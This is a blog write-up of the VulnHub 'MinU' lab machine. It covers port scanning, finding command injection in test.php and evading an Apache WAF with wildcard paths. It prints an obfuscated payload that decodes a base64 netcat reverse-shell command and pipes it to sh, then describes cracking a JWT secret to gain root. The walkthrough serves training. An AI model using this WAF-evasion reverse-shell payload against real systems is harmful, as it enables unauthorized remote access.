MinU machine is a Ubuntu Based virtual machine release from vulnhub design to test your knowledge how to evade waf in apache. I personally think that this is a quite a challenge for me and i'm not gonna lie to all of you i reference some method from couple of blog post on how to solve this machine but still its a quite fun ride for me.
Lets get started
I like to begin to work on the machine with scanning all the port using nmap and use high intensity scanning since the machine is install locally it will not cost you a significant time.
as you can see from the result that only port 80 which is web server is served for us and if you try to open the web it is just going to say a default web page. So i start to enumerate the website using dirsearch and i found a "test.php"page
but what really interesting is the parameter it goes like:
http://<ip address>/test.php?file=<filename>
it seems that the param expect a file to be input so i start to put a string for directory traversal : ../../../../../../etc/passwd
unfortunately every time i try to directory traversal attack it always end with forbidden banner it seems that the application is protected by waf.
so i continue my testing by using wfuzz. It is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections.
It is going to give you a lot of result i suggest you to put the "--hc 403" to hide 403 content so it give much more clarity when reading it.
lets focus on the result contain "C=200" code since this is accepted payload by the web application. As you can see we can execute a linux command in the web application by using "|id"
sweet :) now we find our point of entry. But not so fast ! as i mentioned our application is equipped with WAF and everytime i enter a malicious command whether to dump a sensitive file or create backdoor it was overcome by the WAF
How do we evade WAF ? well according to https://www.exploit-db.com/docs/43946 we can use the question mark "?" to evade firewall. question mark is consider as a wildcard character like a "*" to handle multiple files.
i learn to create the right exploit form this blog: https://medium.com/@honze_net/vulnhub-minu-1-write-up-8032fdda5939 and i come out with python script that will automatically generate the payload for me
ok let me break it down to you how to interpreted this payload:
basically it goes like this:
& /bi?/ech? bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMTAyLiA4ODg4 | /u?r/b?n/b?s?64 -d | /b?n/sh
1. & use to create a new line of command
2. /bi?/ech? is just /bin/echo but we use wild char to evade waf
3. bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMTAyLiA4ODg4 is a base 64 for nc -e /bin/bash 192.168.56.102. 8888 we need to encode the payload to evade waf
the first three point will print a base64 value to the webpage
4. | /u?r/b?n/b?s? 64 -d is decode the base64 to the real value.
5. | b?n/s? is just /bin/sh the decoded value will transfer to the /bin/sh command and execute it let us to create a backdoor.
if we put the payload to the param and execute it we will get a reverse shell :)
we still get the lowest privilege it is time to do privilege escalation. After a while enumerating the content of the machine i stumble a hidden file called "._pw_"
it is a JWT token and we can crack the encrypted string using c-jwt-cracker it is a c based tool to crack a jwt token https://github.com/brendan-rius/c-jwt-cracker
before you install the tools using "make" you need to install the "libssl-dev" library
command: sudo apt install libssl-dev
we got the secret, yeay ! now you can use this credential to log to the machine as the root account.
Comments
Post a Comment